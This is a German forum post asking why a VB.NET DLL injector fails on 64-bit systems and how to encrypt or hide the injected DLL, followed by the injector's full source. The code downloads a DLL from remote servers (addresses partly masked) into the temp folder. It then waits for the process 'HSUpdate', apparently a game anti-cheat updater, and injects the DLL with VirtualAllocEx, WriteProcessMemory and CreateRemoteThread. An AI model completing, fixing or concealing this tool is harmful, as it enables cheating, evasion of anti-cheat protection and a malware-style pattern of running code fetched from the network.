Nun habe ich das Problem auf 32bit funktioniert es auf 64bit nicht...
Und noch eine wichtige frage : kann ich die datei auch verstecken die dll die injected wird bzw crypten und der injektor entcryptet sie ? Mfg
Code:
Imports System.Net Imports System.Environment Public Class injektor1 Friend WithEvents MyWebClient As New Net.WebClient 'Private Sub MyWebClient_DownloadProgressChanged(ByVal sender As Object, ByVal e As System.Net.DownloadProgressChangedEventArgs) Handles MyWebClient.DownloadProgressChanged ' Form2.ProgressBar1.Value = e.ProgressPercentage 'End Sub Private TargetProcessHandle As Integer Private pfnStartAddr As Integer Private pszLibFileRemote As String Private TargetBufferSize As Integer Public Const PROCESS_VM_READ = &H10 Public Const TH32CS_SNAPPROCESS = &H2 Public Const MEM_COMMIT = 4096 Public Const PAGE_READWRITE = 4 Public Const PROCESS_CREATE_THREAD = (&H2) Public Const PROCESS_VM_OPERATION = (&H8) Public Const PROCESS_VM_WRITE = (&H20) Public Declare Function ReadProcessMemory Lib "kernel32" ( _ ByVal hProcess As Integer, _ ByVal lpBaseAddress As Integer, _ ByVal lpBuffer As String, _ ByVal nSize As Integer, _ ByRef lpNumberOfBytesWritten As Integer) As Integer Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" ( _ ByVal lpLibFileName As String) As Integer Public Declare Function VirtualAllocEx Lib "kernel32" ( _ ByVal hProcess As Integer, _ ByVal lpAddress As Integer, _ ByVal dwSize As Integer, _ ByVal flAllocationType As Integer, _ ByVal flProtect As Integer) As Integer Public Declare Function WriteProcessMemory Lib "kernel32" ( _ ByVal hProcess As Integer, _ ByVal lpBaseAddress As Integer, _ ByVal lpBuffer As String, _ ByVal nSize As Integer, _ ByRef lpNumberOfBytesWritten As Integer) As Integer Public Declare Function GetProcAddress Lib "kernel32" ( _ ByVal hModule As Integer, ByVal lpProcName As String) As Integer Private Declare Function GetModuleHandle Lib "Kernel32" Alias "GetModuleHandleA" ( _ ByVal lpModuleName As String) As Integer Public Declare Function CreateRemoteThread Lib "kernel32" ( _ ByVal hProcess As Integer, _ ByVal lpThreadAttributes As Integer, _ ByVal dwStackSize As Integer, _ ByVal lpStartAddress As Integer, _ ByVal lpParameter As Integer, _ ByVal dwCreationFlags As Integer, _ ByRef lpThreadId As Integer) As Integer Public Declare Function OpenProcess Lib "kernel32" ( _ ByVal dwDesiredAccess As Integer, _ ByVal bInheritHandle As Integer, _ ByVal dwProcessId As Integer) As Integer Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _ ByVal lpClassName As String, _ ByVal lpWindowName As String) As Integer Private Declare Function CloseHandle Lib "kernel32" Alias "CloseHandleA" ( _ ByVal hObject As Integer) As Integer Dim ExeName As String = IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath) Private Sub Inject() Timer1.Stop() Dim TargetProcess As Process() = Process.GetProcessesByName(TextBox2.Text) TargetProcessHandle = OpenProcess(PROCESS_CREATE_THREAD Or PROCESS_VM_OPERATION Or PROCESS_VM_WRITE, False, TargetProcess(0).Id) pszLibFileRemote = System.IO.Path.GetTempPath() & TextBox3.Text pfnStartAddr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA") TargetBufferSize = 1 + Len(pszLibFileRemote) Dim Rtn As Integer Dim LoadLibParamAdr As Integer LoadLibParamAdr = VirtualAllocEx(TargetProcessHandle, 0, TargetBufferSize, MEM_COMMIT, PAGE_READWRITE) Rtn = WriteProcessMemory(TargetProcessHandle, LoadLibParamAdr, pszLibFileRemote, TargetBufferSize, 0) CreateRemoteThread(TargetProcessHandle, 0, 0, pfnStartAddr, LoadLibParamAdr, 0, 0) If Form2.CheckBox1.Checked = True Then Form1.Close() Application.Exit() End If If Form2.CheckBox1.Checked = False Then End If End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick If IO.File.Exists(System.IO.Path.GetTempPath() & TextBox3.Text) Then Dim TargetProcess As Process() = Process.GetProcessesByName("HSUpdate") If TargetProcess.Length = 0 Then Form2.Label22.Text = ("Waiting For" & " " & TextBox2.Text) Else Timer1.Stop() Form2.Label22.Text = "Inject succes now running" Call Inject() End If Else Form2.Label22.Text = "Error" End If End Sub Private Sub injektor1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load TextBox1.Text = New Net.WebClient().DownloadString("http://***1/client/link1.txt") TextBox2.Text = New Net.WebClient().DownloadString("http://****47.81/client/prozess1.txt") TextBox3.Text = New Net.WebClient().DownloadString("http://**7.81/client/dll1.txt") Dim dateiPfad As String = My.Computer.FileSystem.SpecialDirectories.Temp & "/" & TextBox3.Text Dim internetPfad As String = TextBox1.Text Dim client As New System.Net.WebClient client.DownloadFile(internetPfad, dateiPfad) Timer1.Start() Timer1.Interval = 50 End Sub End Class